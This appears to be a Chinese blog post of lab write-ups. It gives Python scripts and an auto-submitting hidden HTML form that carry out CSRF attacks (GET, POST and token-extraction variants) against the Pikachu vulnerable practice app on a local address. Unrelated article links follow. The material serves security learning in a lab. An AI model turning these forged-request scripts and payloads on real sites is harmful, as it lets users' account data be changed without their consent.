pikachu自编CSRF(GET),CSRF(POST),CSRF(token)

复制代码
#与get相似,只是修改了一些请求方式
复制代码
#这个漏洞产生的验证就是token实时验证,以及前端存在的Cookie验证,需要验证两个

自编CSRF(GET),

复制代码
import requests
from urllib.parse import urlencode

target_url  = "http://192.168.8.1/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php"

check_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfget/csrf_get.php" #后续检测是否修改

payload = {
    "sex":"girl",
    "phonenum":"123456",
    "add":"CSRF执行成功",
    "email":"123.COM",
    "submit":"submit"
}

query_str = urlencode(payload)#因为+号前后要保持类型一致,需要对字典进行urlencode()编码一下
alert_target = target_url + "?" + query_str

print(f"需要发送给用户的链接为:{alert_target}")

#模仿用户被攻击

#用户点击被特意构造的payload

headers = {
    "Cookie":"PHPSESSID=df0u2o787mgfgc0avf392ksd7g"
}

requests.get(target_url, params=payload, headers=headers )

resp = requests.get(check_url,headers=headers)

print("[+] 注入完成 ")
print("[+] 检查注入是否成功: ","CSRF执行成功" in resp.text)

CSRF(POST),

复制代码
#与get相似,只是修改了一些请求方式
import requests

target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php"

get_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post.php"

payload = {
    "sex":"girl",
    "phonenum":"123456",
    "add":"CSRF的POST攻击",
    "email":"qq.com",
    "submit":"submit"
}

#构造攻击的url,模仿被攻击

Session = requests.Session()

headers ={
    "Cookie":"PHPSESSID=49mmcmofpdtoh0vn7jvkoj13r2"
}

requests.post(target_url, data=payload, headers=headers)

#
resp = requests.get(get_url, headers=headers)

print("[+] 攻击完成 ")
if "123456" in resp.text:
    print("[+] 查看是否注入成功! ")
else:
    print("[-] 注入失败 !" )

CSRF(token)

复制代码
#这个漏洞产生的验证就是token实时验证,以及前端存在的Cookie验证,需要验证两个
"""
get构造
# 拼接成可攻击的URL
evil_url = target_url + "?" + urlencode(payload)
payload = target_ul + "?" + urlencode(payload)
"""

import requests
import re

# target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get_edit.php"
#
# payload = {
#     "sex":"girl",
#     "phonenum":"123456",
#     "add":"CSRF-token",
#     "email":"321@qq.com",
#     "submit":"submit"
# }
#

# html = '''
# <form action="http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
# <input type="hidden" name="sex" value="girl">
# <input type="hidden" name="phonenum" value="123456">
# <input type="hidden" name="add" value="CSRF-POST">
# <input type="hidden" name="email" value="123@qq.com">
# <input type="hidden" name="submit" value="submit">
# </form>
# <script>document.forms[0].submit()</script>
# '''
#
# with open("CSRF_token.html","w",encoding = "utf-8") as f:
#     f.write(html)
#
# print("[+] 攻击脚本已写好CSRF_token.html")


#假设中招了
target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get_edit.php"

get_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get.php"

session = requests.Session()

headers = {
    "Cookie": "PHPSESSID=if9t2mbpc5c5rf83p1slcn7748"
}

session.get(get_url, headers=headers)

target_get = session.get(url=target_url, headers=headers)
token = re.search(r'name="token" value="(.*?)"',target_get.text).group(1)
print(f"[+] 已获取实时Token:{token}")

payload = {
    "sex":"girl",
    "phonenum":"123456",
    "add":"CSRF-token",
    "email":"321@qq.com",
    "token":token,
    "submit":"submit"
}
# resp = requests.get(get_url,headers=headers)
session.post(url=target_url, data=payload, headers=headers)

session.get(target_url, headers=headers)
resp = session.get(url=get_url, headers=headers)
print("[+] 注入成功")
print("[+] 检查测是否正常注入: ", "CSRF-token" in resp.text)
相关推荐
阳光是sunny8 小时前
Vue 项目怎么做用户行为全链路监控?轻量插件方案详解
前端·面试·架构
ZhengEnCi8 小时前
Q04-Vite禁用CSS代码分割-解决生产环境样式加载顺序混乱问题
前端·vue.js·vite
九酒9 小时前
AI Agent 开发踩坑记:口播功能非得用 APP 原生实现吗?
前端·人工智能·agent
Jackson__9 小时前
做了一段时间的AI coding后,我终于搞清了 CLI 和 MCP 的区别
前端·agent·ai编程
IT_陈寒12 小时前
JavaScript项目实战经验分享
前端·人工智能·后端
用户479492835691513 小时前
6w star,GitHub 趋势第一的 Ponytail,这个agent插件到底在火什么
前端·后端
薛定喵的谔14 小时前
我开源了一个精致的 Next.js 博客模板:Skyplume
前端·前端框架·next.js
张龙68715 小时前
构建生产级 AI Agent:工具调用与记忆架构实战指南
前端
kyriewen16 小时前
2026 年了,还在用 Node.js?Bun 迁移实战:20 分钟搞定,附踩坑记录
前端·javascript·node.js
青山Coding17 小时前
Cesium应用(八):物体运动的实现思路
前端·cesium